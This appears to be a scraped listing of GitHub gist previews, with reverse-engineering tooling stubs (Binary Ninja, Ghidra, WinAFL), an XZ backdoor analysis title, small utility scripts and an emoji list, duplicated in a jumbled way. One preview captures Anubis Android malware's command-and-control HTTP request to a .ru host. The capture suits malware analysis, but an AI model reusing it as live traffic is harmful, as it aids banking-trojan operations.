i64

## XZ Backdoor Analysis
XZ Backdoor symbol deobfuscation. Updated as i make progress

## bn-cheat.md

      
              1 file
            
          
              6 forks
            
          
              0 comments
            
          
              31 stars
            
          
                alexander-hanel
                / bn-cheat.md
            
            
              Last active
              June 19, 2024 20:56
            
              
                Cheat Sheet for Binary Ninja
              
          
    Binary Ninja Python API Cheat Sheet

This is a work in progress by someone who is learning about Binary Ninja.
References

https://api.binary.ninja/binaryninja.binaryview-module.html
https://gist.github.com/psifertex/6fbc7532f536775194edd26290892ef7

Metadata Details

Get database name

  
## LaunchWinAFL.java
// Launch WinAFL with current function as hook location
//@author richinseattle
//@category _NEW_
//@keybinding
//@menupath
//@toolbar

// Usage:
// Install DynamoRIO and WinAFL
// Add LaunchWinAFL to Ghidra scripts

## GhidraDecompiler.java
// Copyright (C) 2019 Guillaume Valadon <guillaume@valadon.net>
// This program is published under a GPLv2 license

/*
 * Decompile a function with Ghidra
 *
 * analyzeHeadless . Test.gpr -import $BINARY_NAME -postScript GhidraDecompiler.java $FUNCTION_ADDRESS -deleteProject -noanalysis
 *
*/

## anubis CnC
POST /private/tuk_tuk.php HTTP/1.1
Content-Length: 104
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host: aktivierung-342675-deustchland-services.ru
Connection: close
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

p=NjBkMDgxOTg5ODYyMmUxOThjY2Y2ZTI3OGYyNDZjMDE1OTJhOWE3M2ZiZjZlODVkMGE5NWMyNDVm
ZjY3NTQ5ZTc3YWNhOGQxOGM=

## writeup.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              2 stars
            
          
                pgy
                / writeup.md
            
            
              Created
              July 1, 2018 11:29
            
              
                google ctf 2018 keygenme writeup
              
          
    KEYGENME writeup

This is a walk-through of how I solved the KEYGENME reverse engineering challenge
at the Google CTF 2018 qualifier.
Challenge description


I bet you can't reverse this algorithm!

The challenge contained an executable binary called main and a server

  
## vMetaDate.sh
#!/bin/bash

# small tool to retreive vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login)

# sudo apt install curl

parse(){
    local IFS=\>
    read -d \< CELL VALUE
}

## DigitalOcean_NoVNC_Paste.js
// This will open up a prompt for text to send to a console session on digital ocean
//  Useful for long passwords
(function () {
        var t = prompt("Enter text to be sent to console, (This wont send the enter keystroke)").split("");
        function f() {

                var character = t.shift();
                var i=[];
                var code = character.charCodeAt();
                var needs_shift = "!@#$%^&*()_+{}:\"<>?~|".indexOf(character) !== -1

## gist:7360908

      
              1 file
            
          
              3674 forks
            
          
              1032 comments
            
          
              16837 stars
            
          
                rxaviers
                / gist:7360908
            
            
              Last active
              June 28, 2024 17:50
            
              
                Complete list of github markdown emoji markup
              
          
    People


 :bowtie:
😄 :smile:
😆 :laughing:


😊 :blush:
😃 :smiley:
☺️ :relaxed:


😏 :smirk:
😍 :heart_eyes:
😘 :kissing_heart:


😚 :kissing_closed_eyes:
😳 :flushed:
😌 :relieved:


😆 :satisfied:
😁 :grin:
😉 :wink:


😜 :stuck_out_tongue_winking_eye:
😝 :stuck_out_tongue_closed_eyes:
😀 :grinning:


😗 :kissing:
😙 :kissing_smiling_eyes:
😛 :stuck_out_tongue:
	// Launch WinAFL with current function as hook location
	//@author richinseattle
	//@category _NEW_
	//@keybinding
	//@menupath
	//@toolbar

	// Usage:
	// Install DynamoRIO and WinAFL
	// Add LaunchWinAFL to Ghidra scripts
	// Copyright (C) 2019 Guillaume Valadon <guillaume@valadon.net>
	// This program is published under a GPLv2 license

	/*
	* Decompile a function with Ghidra
	*
	* analyzeHeadless . Test.gpr -import $BINARY_NAME -postScript GhidraDecompiler.java $FUNCTION_ADDRESS -deleteProject -noanalysis
	*
	*/
	POST /private/tuk_tuk.php HTTP/1.1
	Content-Length: 104
	User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
	Host: aktivierung-342675-deustchland-services.ru
	Connection: close
	Accept-Encoding: gzip, deflate
	Content-Type: application/x-www-form-urlencoded

	p=NjBkMDgxOTg5ODYyMmUxOThjY2Y2ZTI3OGYyNDZjMDE1OTJhOWE3M2ZiZjZlODVkMGE5NWMyNDVm
	ZjY3NTQ5ZTc3YWNhOGQxOGM=
	#!/bin/bash

	# small tool to retreive vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login)

	# sudo apt install curl

	parse(){
	local IFS=\>
	read -d \< CELL VALUE
	}
	// This will open up a prompt for text to send to a console session on digital ocean
	// Useful for long passwords
	(function () {
	var t = prompt("Enter text to be sent to console, (This wont send the enter keystroke)").split("");
	function f() {

	var character = t.shift();
	var i=[];
	var code = character.charCodeAt();
	var needs_shift = "!@#$%^&*()_+{}:\"<>?~\|".indexOf(character) !== -1
`:bowtie:`	😄 `:smile:`	😆 `:laughing:`
😊 `:blush:`	😃 `:smiley:`	☺️ `:relaxed:`
😏 `:smirk:`	😍 `:heart_eyes:`	😘 `:kissing_heart:`
😚 `:kissing_closed_eyes:`	😳 `:flushed:`	😌 `:relieved:`
😆 `:satisfied:`	😁 `:grin:`	😉 `:wink:`
😜 `:stuck_out_tongue_winking_eye:`	😝 `:stuck_out_tongue_closed_eyes:`	😀 `:grinning:`
😗 `:kissing:`	😙 `:kissing_smiling_eyes:`	😛 `:stuck_out_tongue:`